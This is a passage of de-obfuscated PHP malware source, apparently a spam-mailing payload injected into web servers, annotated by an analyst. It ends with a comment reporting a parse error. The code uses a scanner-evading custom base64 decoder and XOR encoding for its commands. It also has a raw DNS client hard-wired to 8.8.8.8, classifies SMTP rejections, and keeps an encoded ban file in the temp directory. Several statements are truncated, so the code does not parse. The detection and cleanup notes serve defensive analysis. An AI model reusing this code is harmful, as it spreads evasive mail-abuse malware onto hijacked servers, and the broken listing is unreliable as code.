// The sender domain is taken from the request's Host header with a leading www./ftp. removed.
$pakfn17['hostFrom'] = @preg_replace('/^(www|ftp)\./i', '', $_SERVER['HTTP_HOST']);
// A bare IPv4 Host header is reverse-resolved; 'domain.com' is the hard-coded fallback.
if (preg_match('/^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$/', $pakfn17['hostFrom'])) {
$jkwmb75 = zozoy17($u11, $pakfn17['hostFrom']);
if ($jkwmb75 != FALSE) {
$pakfn17['hostFrom'] = $jkwmb75;
}
else {
$pakfn17['hostFrom'] = 'domain.com';
}
}
// Drop a ":port" suffix from the host name.
if (($zfstt22 = strpos($pakfn17['hostFrom'], ':')) !== false) {
$pakfn17['hostFrom'] = substr($pakfn17['hostFrom'], 0, $zfstt22);
}
$pakfn17['hostFrom'] = @strtolower($pakfn17['hostFrom']);
return TRUE;
}
// Returns the value of POST field $ggkku5, or FALSE when no field name is given.
// With $qqhjy59 set, the value is first passed through nqygw82() and every resulting byte is
// XORed with 2. In both cases the result then goes through stripslashes() and urldecode().
// Analyst note: the same XOR-2 layer is applied to everything the payload prints inside
// [[...]], so captured requests and responses can be decoded with the same two steps.
function zqrkk46($u11, $ggkku5, $qqhjy59)
{
if (!isset($ggkku5) || $ggkku5 == "") {
return FALSE;
}
$luwnl52 = @$_POST[$ggkku5];
if ($qqhjy59) {
$luwnl52 = nqygw82($u11, $luwnl52);
for ($gwcxa40 = 0; $gwcxa40 < strlen($luwnl52); $gwcxa40++) {
$luwnl52[$gwcxa40] = chr(ord($luwnl52[$gwcxa40]) ^ 2);
}
}
return urldecode(stripslashes($luwnl52));
}
// Hand-written decoder over the standard base64 alphabet: the input is cut into groups of up
// to four alphabet characters and each group is unpacked six bits at a time into bytes.
// It appears to be a replacement for base64_decode(); presumably it exists so the payload
// does not contain that function name, which many webshell scanners flag.
// The class [A-z] also matches the punctuation between 'Z' and 'a'; such characters have no
// entry in the lookup table $cypnk62.
function nqygw82($u11, $wbhde23)
{
$oghrj40 = "";
// Byte value -> character table.
for ($mrkfo51 = 0; $mrkfo51 < 256; $mrkfo51++) {
$ousdp9[$mrkfo51] = chr($mrkfo51);
}
// Alphabet character -> 6-bit value (the final argument 1 is PREG_SPLIT_NO_EMPTY).
$cypnk62 = array_flip(preg_split('//', 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/', -1, 1));
$salxs44 = array();
preg_match_all('([A-z0-9+\/]{1,4})', $wbhde23, $salxs44);
foreach($salxs44[0] as $cfojp62) {
$bvpdr17 = 0;
for ($mrkfo51 = 0; isset($cfojp62[$mrkfo51]); $mrkfo51++) {
$bvpdr17 = ($bvpdr17 << 6) + $cypnk62[$cfojp62[$mrkfo51]];
if ($mrkfo51 > 0) {
// Emit the completed byte and keep only the leftover low bits for the next one.
$oghrj40.= $ousdp9[$bvpdr17 >> (4 - (2 * ($mrkfo51 - 1))) ];
$bvpdr17 = $bvpdr17 & (0xf >> (2 * ($mrkfo51 - 1)));
}
}
}
return $oghrj40;
}
// Output encoding used for everything the payload reports or stores: XOR every byte of
// $surff43 with 2, then base64-encode. To read a captured [[...]] payload or the ban file,
// base64-decode it and XOR each byte with 2 again.
function dcydj64($u11, $surff43)
{
for ($gwcxa40 = 0; $gwcxa40 < strlen($surff43); $gwcxa40++) {
$surff43[$gwcxa40] = chr(ord($surff43[$gwcxa40]) ^ 2);
}
return base64_encode($surff43);
}
// Inverse of dcydj64(): decode $pnlpz9 with the payload's own base64 decoder (nqygw82), then
// XOR every byte with 2. In this listing it is used to read the persisted ban file.
function nhraz16($u11, $pnlpz9)
{
$surff43 = nqygw82($u11, $pnlpz9);
for ($gwcxa40 = 0; $gwcxa40 < strlen($surff43); $gwcxa40++) {
$surff43[$gwcxa40] = chr(ord($surff43[$gwcxa40]) ^ 2);
}
return $surff43;
}
// Opens (or continues opening) a TCP or UDP connection with whichever API SOCKET_TYPE selects.
//   $uwtpi87  existing socket to reuse, or FALSE to create one (sockets-extension branch only)
//   $ncwir84  SOCKET_PROTO_TCP or SOCKET_PROTO_UDP
//   $qxhif66  remote address, $dqwpy49 remote port, $lvfwb5 timeout in seconds
//   $rpfsm11 / $ftcug81  receive the error code and message (by reference)
//   $vzcon96  TRUE to switch the socket or stream to non-blocking mode
// Returns the socket/stream, or FALSE on an invalid protocol, an invalid SOCKET_TYPE or a
// failed open. In the sockets branch a failed connect still returns the socket and reports
// the error through $rpfsm11, which is how the caller keeps polling a non-blocking connect.
function avcbc52($u11, $uwtpi87, $ncwir84, $qxhif66, $dqwpy49, $lvfwb5, &$rpfsm11, &$ftcug81, $vzcon96 = false)
{
$iinie89 = "";
$dsndu37 = NULL;
$pkbfn64 = NULL;
$rpfsm11 = 0;
$ftcug81 = "";
if ($ncwir84 == constant('SOCKET_PROTO_TCP')) {
$iinie89 = 'tcp';
$dsndu37 = SOL_TCP;
$pkbfn64 = SOCK_STREAM;
}
else
if ($ncwir84 == constant('SOCKET_PROTO_UDP')) {
$iinie89 = 'udp';
$pkbfn64 = SOCK_DGRAM;
$dsndu37 = SOL_UDP;
}
else {
$ftcug81 = 'Error: invalid protocol';
return FALSE;
}
switch (constant('SOCKET_TYPE')) {
case constant('SOCKET_TYPE_SOCKET'):
if ($uwtpi87 == FALSE) {
$uwtpi87 = @socket_create(AF_INET, $pkbfn64, $dsndu37);
if ($uwtpi87 == FALSE) {
$rpfsm11 = socket_last_error();
$ftcug81 = socket_strerror($rpfsm11);
break;
}
socket_set_option($uwtpi87, SOL_SOCKET, SO_REUSEADDR, 1);
socket_set_option($uwtpi87, SOL_SOCKET, SO_RCVTIMEO, array(
'sec' => $lvfwb5,
'usec' => 0
));
socket_set_option($uwtpi87, SOL_SOCKET, SO_SNDTIMEO, array(
'sec' => $lvfwb5,
'usec' => 0
));
if ($vzcon96) {
socket_set_nonblock($uwtpi87);
}
}
if (!@socket_connect($uwtpi87, $qxhif66, $dqwpy49)) {
$rpfsm11 = socket_last_error($uwtpi87);
$ftcug81 = socket_strerror($rpfsm11);
}
if ($vzcon96) {
socket_set_nonblock($uwtpi87);
}
break;
case constant('SOCKET_TYPE_FSOCKET'):
$uwtpi87 = @fsockopen($iinie89 . '://' . $qxhif66, $dqwpy49, $rpfsm11, $ftcug81, $lvfwb5);
if ($uwtpi87 && $vzcon96) {
@stream_set_blocking($uwtpi87, 0);
}
@stream_set_timeout($uwtpi87, $lvfwb5);
break;
case constant('SOCKET_TYPE_STREAM'):
$uwtpi87 = @stream_socket_client($iinie89 . '://' . $qxhif66 . ':' . $dqwpy49, $rpfsm11, $ftcug81, $lvfwb5);
if ($uwtpi87 && $vzcon96) {
@stream_set_blocking($uwtpi87, 0);
}
@stream_set_timeout($uwtpi87, $lvfwb5);
break;
default:
$ftcug81 = 'Error: invalid socket type';
return FALSE;
}
return $uwtpi87;
}
// Closes $uwtpi87 with socket_close() or fclose(), depending on SOCKET_TYPE, and resets the
// caller's variable to FALSE (it is passed by reference). Does nothing for a FALSE handle.
function dgsvq12($u11, &$uwtpi87)
{
if ($uwtpi87 == FALSE) {
return;
}
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_SOCKET')) {
@socket_close($uwtpi87);
}
else {
@fclose($uwtpi87);
}
$uwtpi87 = FALSE;
return;
}
// Reads up to $zbqcr30 bytes from $uwtpi87. Returns the data, or FALSE for a missing handle
// or a stream at EOF. Error details are written to $rpfsm11 / $ftcug81 by reference.
// In the stream branch an empty read sets the code to 35, which the callers in this file
// treat as "no data yet" rather than as a failure.
function mzezd77($u11, $uwtpi87, $zbqcr30, &$rpfsm11, &$ftcug81)
{
if ($uwtpi87 == FALSE) {
return FALSE;
}
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_SOCKET')) {
$oghrj40 = @socket_read($uwtpi87, $zbqcr30, PHP_BINARY_READ);
if ($oghrj40 == FALSE) {
$rpfsm11 = socket_last_error($uwtpi87);
$ftcug81 = socket_strerror($rpfsm11);
}
}
else {
if (@feof($uwtpi87)) {
return FALSE;
}
$oghrj40 = @fread($uwtpi87, $zbqcr30);
if (strlen($oghrj40) == 0) {
$rpfsm11 = 35;
}
}
return $oghrj40;
}
// Writes $bsxhw62 to $uwtpi87 and returns the result of socket_write()/fwrite() (the byte
// count on success), or FALSE for a missing handle or a stream at EOF.
// Only the sockets branch fills $rpfsm11 / $ftcug81; the stream branch leaves them untouched.
function nmavu24($u11, $uwtpi87, $bsxhw62, &$rpfsm11, &$ftcug81)
{
if ($uwtpi87 == FALSE) {
return FALSE;
}
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_SOCKET')) {
$oghrj40 = @socket_write($uwtpi87, $bsxhw62);
if ($oghrj40 == FALSE) {
$rpfsm11 = socket_last_error($uwtpi87);
$ftcug81 = socket_strerror($rpfsm11);
}
}
else {
if (@feof($uwtpi87)) {
return FALSE;
}
$oghrj40 = @fwrite($uwtpi87, $bsxhw62);
}
return $oghrj40;
}
// Sets the send and receive timeouts of $uwtpi87 to $lvfwb5 seconds, using socket options or
// stream_set_timeout() depending on SOCKET_TYPE. Returns FALSE for a missing handle, TRUE
// otherwise; failures of the underlying calls are suppressed and not reported.
function dzxhy75($u11, $uwtpi87, $lvfwb5)
{
if ($uwtpi87 == FALSE) {
return FALSE;
}
if (constant('SOCKET_TYPE') == constant('SOCKET_TYPE_SOCKET')) {
@socket_set_option($uwtpi87, SOL_SOCKET, SO_RCVTIMEO, array(
'sec' => $lvfwb5,
'usec' => 0
));
@socket_set_option($uwtpi87, SOL_SOCKET, SO_SNDTIMEO, array(
'sec' => $lvfwb5,
'usec' => 0
));
}
else {
@stream_set_timeout($uwtpi87, $lvfwb5);
}
return TRUE;
}
// Minimal DNS client: sends one query of type $kuknm3 for name $ttgac24 over UDP to the
// hard-coded resolver 8.8.8.8:53 and parses the reply into
// ['header' => ..., 'que' => [...], 'ans' => [...], 'auth' => [...], 'add' => [...]].
// Returns FALSE when the socket cannot be opened, the write is short, or the reply is
// shorter than the 12-byte header.
// Detection note: this bypasses the host's configured resolver, so DNS packets sent straight
// from the web server process to 8.8.8.8 stand out on hosts that normally use a local resolver.
// NOTE(review): the first argument of explode() below is missing in this listing (a string
// literal appears to have been lost during de-obfuscation), so the file does not parse as
// published.
function kymrg16($u11, $ttgac24, $kuknm3)
{
$rpfsm11 = 0;
$ftcug81 = "";
$uwtpi87 = avcbc52($u11, FALSE, constant('SOCKET_PROTO_UDP') , '8.8.8.8', 53, 10, $rpfsm11, $ftcug81);
if (!$uwtpi87) {
return FALSE;
}
$qtxhy15 = rand(0x0001, 0xFFFE);
$twrqf75 = explode(, $ttgac24);
// Header: transaction id, flags 0x0100, one question, no other records.
$fflyc27 = pack('nnnnnn', $qtxhy15, 0x0100, 0x0001, 0x0000, 0x0000, 0x0000);
// Question name as length-prefixed labels.
foreach($twrqf75 as $mmcxs32) {
$fflyc27.= pack('Ca*', strlen($mmcxs32) , $mmcxs32);
}
// Name terminator, query type, class 1.
$fflyc27.= pack('Cnn', 0x00, $kuknm3, 0x0001);
$thfyk26 = nmavu24($u11, $uwtpi87, $fflyc27, $rpfsm11, $ftcug81);
if (!$thfyk26 || $thfyk26 != strlen($fflyc27)) {
dgsvq12($u11, $uwtpi87);
return FALSE;
}
$rtgfd32 = mzezd77($u11, $uwtpi87, 4086, $rpfsm11, $ftcug81);
if ($rtgfd32 == FALSE || strlen($rtgfd32) < 12) {
dgsvq12($u11, $uwtpi87);
return FALSE;
}
// The reply's transaction id is unpacked but never compared with $qtxhy15.
$vhslt56 = unpack('ntid/nflags/nque/nans/nauth/nadd', substr($rtgfd32, 0, 12));
// $zuozd44 is the read offset into the reply, starting just past the header.
$zuozd44 = 12;
$oghrj40 = array(
'header' => $vhslt56
);
for ($mrkfo51 = constant('DNS_STEP_QESTION'); $mrkfo51 <= constant('DNS_STEP_ADDITIONAL'); $mrkfo51++) {
$jctmx81 = '';
switch ($mrkfo51) {
case constant('DNS_STEP_QESTION'):
$jctmx81 = 'que';
break;
case constant('DNS_STEP_ANSWER'):
$jctmx81 = 'ans';
break;
case constant('DNS_STEP_AUTHORITY'):
$jctmx81 = 'auth';
break;
case constant('DNS_STEP_ADDITIONAL'):
$jctmx81 = 'add';
break;
}
// Record counts come straight from the reply header; offsets are not bounds-checked.
for ($fxzub70 = 0; $fxzub70 < $vhslt56[$jctmx81]; $fxzub70++) {
$fwcdh66['name'] = xgrgh71($u11, $zuozd44, $rtgfd32);
if ($mrkfo51 == constant('DNS_STEP_QESTION')) {
$fwcdh66 = array_merge($fwcdh66, unpack('ntype/nclass', substr($rtgfd32, $zuozd44, 4)));
$zuozd44+= 4;
}
else {
$fwcdh66 = array_merge($fwcdh66, unpack('ntype/nclass/Nttl/ndatalength', substr($rtgfd32, $zuozd44, 10)));
$zuozd44+= 10;
switch ($fwcdh66['type']) {
case constant('DNS_TYPE_MX'):
$fwcdh66 = array_merge($fwcdh66, unpack('npreference', substr($rtgfd32, $zuozd44, 2)));
$zuozd44+= 2;
$fwcdh66['data'] = xgrgh71($u11, $zuozd44, $rtgfd32);
break;
case constant('DNS_TYPE_A'):
$fwcdh66 = array_merge($fwcdh66, unpack('Ndata', substr($rtgfd32, $zuozd44, 4)));
$zuozd44+= 4;
$fwcdh66['ip'] = long2ip($fwcdh66['data']);
break;
case constant('DNS_TYPE_NS'):
case constant('DNS_TYPE_PTR'):
$fwcdh66['data'] = xgrgh71($u11, $zuozd44, $rtgfd32);
break;
default:
$zuozd44+= $fwcdh66['datalength'];
}
}
$oghrj40[$jctmx81][] = $fwcdh66;
}
}
// The socket opened above is not closed on this path.
return $oghrj40;
}
// Reads one domain name from DNS reply $rtgfd32 starting at offset $ybxcn68 and advances
// $ybxcn68 (by reference) past the bytes the name occupies at that position.
// A byte equal to 0xC0 is treated as a compression pointer whose target is the single
// following byte; other pointer encodings are not handled, and neither pointer loops nor
// out-of-range offsets are checked.
// NOTE(review): the statement `$oghrj40.=;` below has no right-hand side in this listing (a
// string literal appears to have been lost during de-obfuscation), so the file does not parse
// as published.
function xgrgh71($u11, &$ybxcn68, $rtgfd32)
{
$oghrj40 = "";
$bryxm64 = $ybxcn68;
while (ord($rtgfd32[$bryxm64]) != 0) {
if (ord($rtgfd32[$bryxm64]) == 0xC0) {
// Only the first pointer followed moves the caller's offset (by its two bytes).
if ($bryxm64 >= $ybxcn68) {
$ybxcn68+= 2;
}
$bryxm64 = ord($rtgfd32[$bryxm64 + 1]);
continue;
}
if (strlen($oghrj40) > 0) {
$oghrj40.=;
}
// Append the label: one length byte followed by that many characters.
$oghrj40.= substr($rtgfd32, $bryxm64 + 1, ord($rtgfd32[$bryxm64]));
$bryxm64+= ord($rtgfd32[$bryxm64]) + 1;
if ($bryxm64 > $ybxcn68) {
$ybxcn68 = $bryxm64;
}
}
if ($bryxm64 >= $ybxcn68) {
$ybxcn68+= 1;
}
return $oghrj40;
}
// Loads the persisted ban list from <temp dir>/session_a029.tmp and returns only the entries
// whose expiry timestamp is still in the future (an empty array when the file is missing or
// unreadable). The file content is decoded with nhraz16() and then parsed as JSON.
// $myott53 is not used.
// Indicator: a file named session_a029.tmp in the system temp directory whose content is
// base64 text. create_function() evaluates a string as code and no longer exists in PHP 8,
// so this sample targets older PHP versions.
function lqpzi27($u11, $myott53)
{
$oghrj40 = array();
$qplzq81 = oipnm51($u11, 1);
$kptlu46 = xfshv62($u11, $qplzq81) . 'session_a029.tmp';
if (!file_exists($kptlu46)) {
return $oghrj40;
}
$ojqon20 = fopen($kptlu46, 'r');
$kdrkm37 = "";
if ($ojqon20) {
while ($tyklg86 = fgets($ojqon20)) {
$kdrkm37.= $tyklg86;
}
fclose($ojqon20);
$ihmej6 = nhraz16($u11, $kdrkm37);
$ljbpv40 = json_decode($ihmej6, TRUE);
if (is_array($ljbpv40)) {
$oghrj40 = array_filter($ljbpv40, create_function('$x', 'return (time(NULL) < $x); '));
}
}
return $oghrj40;
}
// Persists ban list $siytz64 to <temp dir>/session_a029.tmp, replacing any existing file.
// The list is JSON-encoded (TRUE is passed as json_encode()'s flags argument) and then
// encoded with dcydj64() (XOR 2 + base64). A failed fopen() is silently ignored.
// Cleanup note: this file survives removal of the injected script, so it is worth checking
// the temp directory when remediating a host.
function ksqbs71($u11, $siytz64)
{
$qplzq81 = oipnm51($u11, 1);
$kptlu46 = xfshv62($u11, $qplzq81) . 'session_a029.tmp';
if (file_exists($kptlu46)) {
unlink($kptlu46);
}
$ojqon20 = fopen($kptlu46, 'w');
if ($ojqon20) {
$kdrkm37 = dcydj64($u11, json_encode($siytz64, TRUE));
fwrite($ojqon20, $kdrkm37);
fclose($ojqon20);
}
return;
}
// Classifies an SMTP rejection against rule table $enizl83 and, on a match, bans the rule key
// in $siytz64: 7200 seconds for a 'gl' rule and 86400 seconds for a 'bl' rule (presumably
// grey-listing versus block-listing responses). Returns '(<rule kind>)' on a match, else "".
// From the way it is walked here, $enizl83 maps an MX host suffix to [step => [kind => rules]],
// where a rule is either a regex string or [reply code, enhanced status, regex]; the table
// itself is not part of this listing.
// The reply is first split by dhowq55() into code, enhanced status and normalized text.
function fbflb66($u11, $enizl83, $wxfxn29, &$siytz64)
{
$zebob65 = $xedap26 = $yohad14 = "";
if (!dhowq55($u11, $wxfxn29['s_datain'], $zebob65, $xedap26, $yohad14)) {
return "";
}
foreach($enizl83 as $ydtuc6 => $zdrlc63) {
// Rule keys are matched as a suffix of the job's MX host name.
if (preg_match('/' . preg_quote($ydtuc6) . '$/', $wxfxn29['s_mxhost'])) {
if (!empty($zdrlc63[$wxfxn29['s_step']])) {
foreach($zdrlc63[$wxfxn29['s_step']] as $vtqdz50 => $pyazj91) {
foreach($pyazj91 as $dodjd43) {
if (is_array($dodjd43)) {
// Empty elements of a three-part rule act as wildcards.
if (!empty($dodjd43[0]) && $dodjd43[0] != $zebob65) {
continue;
}
if (!empty($dodjd43[1]) && $dodjd43[1] != $xedap26) {
continue;
}
if (!empty($dodjd43[2]) && !preg_match('/' . $dodjd43[2] . '/', $yohad14)) {
continue;
}
}
else {
if (!preg_match('/' . $dodjd43 . '/', $yohad14)) {
continue;
}
}
if ($vtqdz50 == 'gl') {
$siytz64[$ydtuc6] = time(NULL) + 7200;
}
if ($vtqdz50 == 'bl') {
$siytz64[$ydtuc6] = time(NULL) + 86400;
}
return '(' . $vtqdz50 . ')';
}
}
}
}
}
return "";
}
// Splits SMTP reply $bcbri95 into its three-digit code ($zebob65), its enhanced status code
// ($xedap26, '0.0.0' when absent) and a normalized message text ($npuqq41), all returned by
// reference. Returns FALSE when the reply does not start with a three-digit code.
// Normalization replaces host[ip] pairs with 'zzhip', IPv4 addresses with 'zzip' and e-mail
// addresses with 'zzmal', drops embedded 4xx/5xx codes, turns every non-alphanumeric character
// into a space, lowercases and collapses whitespace, so that rule regexes can match the
// wording of a rejection regardless of the addresses it mentions.
function dhowq55($u11, $bcbri95, &$zebob65, &$xedap26, &$npuqq41)
{
$swihb19 = array();
if (!preg_match('/^([0-9]{3})[ -]([0-9]+\.[0-9]+\.[0-9]+[ -])?(.*)/', $bcbri95, $swihb19)) {
return FALSE;
}
if (empty($swihb19[2])) {
$swihb19[2] = '0.0.0';
}
if (count($swihb19) != 4) {
return FALSE;
}
$sbjct44 = preg_replace('/[a-zA-Z\-0-9\.]+[a-zA-Z]\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\]/', ' zzhip ', $swihb19[3]);
$nfmhg36 = preg_replace('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', ' zzip ', $sbjct44);
$ygfry59 = preg_replace('/[A-Za-z0-9\-\.\_]+\@[A-Za-z0-9\-\.]+/', ' zzmal ', $nfmhg36);
$xtbyn89 = preg_replace('/[45][0-9][0-9]\s/', '', $ygfry59);
$bxevx27 = preg_replace('/[^A-Za-z0-9]/', ' ', $xtbyn89);
$ioclc49 = preg_replace('/\s+/', ' ', strtolower($bxevx27));
$zebob65 = trim($swihb19[1], ' ');
$xedap26 = trim($swihb19[2], ' ');
$npuqq41 = trim($ioclc49, ' ');
return TRUE;
}
// Returns a writable temp directory, or FALSE when none is found: sys_get_temp_dir() if
// available, else the first non-empty of the TMP, TEMP and TMPDIR environment variables, else
// the directory in which tempnam() manages to create a file (that probe file is deleted
// again). $myott53 is not used.
function oipnm51($u11, $myott53)
{
if (function_exists('sys_get_temp_dir')) {
return sys_get_temp_dir();
}
foreach(array(
'TMP',
'TEMP',
'TMPDIR'
) as $dnydp89) {
$yhhvg6 = getenv($dnydp89);
if ($yhhvg6) {
return $yhhvg6;
}
}
// __FILE__ is passed as the directory argument of tempnam().
$yhhvg6 = tempnam(__FILE__, '');
if (file_exists($yhhvg6)) {
unlink($yhhvg6);
return dirname($yhhvg6);
}
return FALSE;
}
// Normalizes directory path $wbhde23 and guarantees a trailing '/'.
// NOTE(review): as printed, the pattern string is `/\/` once PHP has unescaped the
// single-quoted literal, which has no closing delimiter; the original presumably replaced
// backslashes with forward slashes, so this looks like another de-obfuscation artifact.
function xfshv62($u11, $wbhde23)
{
$oghrj40 = preg_replace('/\\/', '/', $wbhde23);
if ($oghrj40[strlen($oghrj40) - 1] != '/') {
$oghrj40.= '/';
}
return $oghrj40;
}
// Returns the first key of rule table $enizl83 that is a suffix of the job's MX host name, or
// FALSE when none matches. The caller uses the result as an index into the ban list.
function zfuri16($u11, $enizl83, $wxfxn29)
{
foreach($enizl83 as $ydtuc6 => $zdrlc63) {
if (preg_match('/' . preg_quote($ydtuc6) . '$/', $wxfxn29['s_mxhost'])) {
return $ydtuc6;
}
}
return FALSE;
}
@joaqhoc

joaqhoc commented Apr 26, 2017

( ! ) Parse error: syntax error, unexpected ',' in www\www.php on line 948
